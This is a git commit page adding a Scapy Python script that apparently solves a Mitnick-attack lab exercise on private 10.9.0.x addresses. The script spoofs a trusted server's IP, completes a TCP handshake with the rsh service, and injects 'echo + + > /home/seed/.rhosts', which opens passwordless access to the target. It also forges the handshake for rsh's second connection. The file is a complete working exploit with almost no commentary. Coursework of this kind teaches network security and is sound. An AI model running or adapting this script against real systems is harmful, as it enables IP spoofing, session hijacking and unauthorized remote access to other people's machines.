tcp and mitnick lab finished
This commit is contained in:
76
Mitnick/Labsetup/volumes/mitnick_final.py
Normal file
76
Mitnick/Labsetup/volumes/mitnick_final.py
Normal file
@@ -0,0 +1,76 @@
|
||||
#!/usr/bin/python3
|
||||
from scapy.all import *
|
||||
import time
|
||||
import threading
|
||||
|
||||
X_IP = "10.9.0.5"
|
||||
SRV_IP = "10.9.0.6"
|
||||
X_PORT = 514
|
||||
SRV_PORT = 1023
|
||||
SECOND_PORT = 1022
|
||||
IFACE = "br-63cae30f0395"
|
||||
|
||||
def mitnick_attack():
|
||||
my_seq = 0x12345678
|
||||
|
||||
# State flags
|
||||
handshake_done = False
|
||||
second_conn_done = False
|
||||
|
||||
def handle_pkt(pkt):
|
||||
nonlocal handshake_done, second_conn_done
|
||||
if not pkt.haslayer(TCP):
|
||||
return
|
||||
|
||||
# First Connection: SYN+ACK
|
||||
if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
|
||||
print(f"Received SYN+ACK. Seq: {pkt[TCP].seq}")
|
||||
|
||||
# Send ACK
|
||||
ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
||||
TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
|
||||
seq=my_seq + 1, ack=pkt[TCP].seq + 1)
|
||||
send(ack_pkt, verbose=0, iface=IFACE)
|
||||
print("Sent ACK")
|
||||
|
||||
# Send RSH data
|
||||
command = "echo + + > /home/seed/.rhosts"
|
||||
data = f"{SECOND_PORT}\x00seed\x00seed\x00{command}\x00"
|
||||
psh_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
||||
TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
|
||||
seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
|
||||
send(psh_pkt, verbose=0, iface=IFACE)
|
||||
print(f"Sent RSH data: {command}")
|
||||
handshake_done = True
|
||||
|
||||
# Second Connection: SYN
|
||||
elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
|
||||
print(f"Received SYN for second connection. Seq: {pkt[TCP].seq}")
|
||||
|
||||
# Send SYN+ACK
|
||||
srv_seq2 = 0x99999999
|
||||
sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
||||
TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
|
||||
seq=srv_seq2, ack=pkt[TCP].seq + 1)
|
||||
send(sa_pkt, verbose=0, iface=IFACE)
|
||||
print("Sent SYN+ACK for second connection")
|
||||
second_conn_done = True
|
||||
|
||||
# Start sniffer in a thread
|
||||
print("Starting Sniffer...")
|
||||
t = threading.Thread(target=lambda: sniff(iface=IFACE, filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15))
|
||||
t.start()
|
||||
|
||||
time.sleep(1) # Give sniffer time to start
|
||||
|
||||
# Step 1: Send spoofed SYN
|
||||
print(f"Step 1: Sending spoofed SYN to {X_IP}:{X_PORT}")
|
||||
ip = IP(src=SRV_IP, dst=X_IP)
|
||||
tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
|
||||
send(ip/tcp, verbose=0, iface=IFACE)
|
||||
|
||||
t.join()
|
||||
print("Attack script finished.")
|
||||
|
||||
if __name__ == "__main__":
|
||||
mitnick_attack()
|
||||
Reference in New Issue
Block a user